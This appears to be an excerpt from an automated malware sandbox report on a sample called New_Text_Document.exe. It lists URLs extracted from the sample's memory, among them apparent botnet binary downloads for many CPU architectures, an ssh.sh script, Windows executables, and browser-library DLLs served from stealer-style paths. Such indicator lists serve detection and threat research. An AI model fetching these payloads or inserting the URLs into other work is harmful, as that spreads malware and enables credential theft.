                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://31.168.60.234:20659/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://31.168.62.37:16999/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://31.17.124.231:38819/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://31.173.124.114:6309/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://31.182.115.211:40309/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://31.220.3.140/a/la.bot.arm
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://31.220.3.140/a/la.bot.arm7
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://31.220.3.140/a/la.bot.mips
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://31.220.3.140/bins/la.bot.arm
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://31.220.3.140/bins/la.bot.arm6
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://31.220.3.140/bins/la.bot.arm7
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://31.220.3.140/bins/la.bot.m68k
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://31.220.3.140/bins/la.bot.mips
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://31.220.3.140/bins/la.bot.mipsel
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://31.220.3.140/bins/la.bot.powerpc
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://31.220.3.140/bins/la.bot.sh4
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://31.220.3.140/bins/la.bot.sparc
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://31.220.3.140/sms/la.bot.arm
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://31.220.3.140/sms/la.bot.arm7
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://31.220.3.140/sms/la.bot.sh4
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://31.25.133.191:14932/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://31.30.57.31:36501/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://31.41.244.146/Downnnnloads/laplas03.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://31.59.12.249:23111/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://35.131.161.166:64385/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://35.143.90.247:52289/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://35.230.66.101/hydro.arc
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://35.230.66.101/hydro.arm
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://35.230.66.101/hydro.arm5
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://35.230.66.101/hydro.arm6
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://35.230.66.101/hydro.arm7
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://35.230.66.101/hydro.i686
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://35.230.66.101/hydro.m68k
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://35.230.66.101/hydro.mips
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://35.230.66.101/hydro.mpsl
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://35.230.66.101/hydro.ppc
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://35.230.66.101/hydro.sh4
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://35.230.66.101/hydro.spc
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://35.230.66.101/hydro.x86
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://35.230.66.101/hydro.x86_64
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://35.230.66.101/ssh.sh
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://36.248.223.250:18514/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://36.38.17.79:27398/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://36.39.146.122:48874/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://36.49.105.34:34385/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://36.64.215.90:13666/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://36.66.139.36:53736/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://36.83.244.221:16786/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://36.88.36.249:4440/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://36.93.41.223:49831/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://360.lcy2zzx.pw:84/32.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://360down7.miiyun.cn/2017/06/radbxnzdxbd.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://37.107.3.81:53940/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://37.142.23.246:3037/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://37.143.220.159:53123/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://37.156.18.8:30361/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://37.156.21.93:7550/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://37.157.219.158:16470/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://37.183.220.190:19876/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://37.189.193.119:25972/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://37.223.103.165:3372/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://37.233.60.68:16106/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://37.34.209.216:59068/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://37.49.230.139/aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/freebl3.dll
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://37.49.230.139/aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/mozglue.dll
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://37.49.230.139/aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/msvcp140.dll
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://37.49.230.139/aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/nss3.dll
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://37.49.230.139/aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/softokn3.dll
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://37.49.230.139/aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/sqlite3.dll
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://37.49.230.139/aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/vcruntime140.dll
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://37.49.230.54/aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/freebl3.dll
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://37.49.230.54/aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/msvcp140.dll
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://37.49.230.54/aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/nss3.dll
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://37.49.230.54/aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/softokn3.dll
